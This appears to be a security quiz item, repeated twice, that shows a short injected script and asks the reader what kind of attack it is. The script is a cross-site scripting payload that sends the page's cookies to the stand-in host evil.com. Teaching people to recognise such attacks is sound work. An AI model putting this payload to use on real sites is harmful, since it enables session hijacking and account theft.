🔒Securityintermediate
Question 1 of 10
<script>
document.location =
'evil.com?cookie=' + document.cookie
</script>
// If injected, this is?What's the output?
Question 1 of 10
<script>
document.location =
'evil.com?cookie=' + document.cookie
</script>
// If injected, this is?What's the output?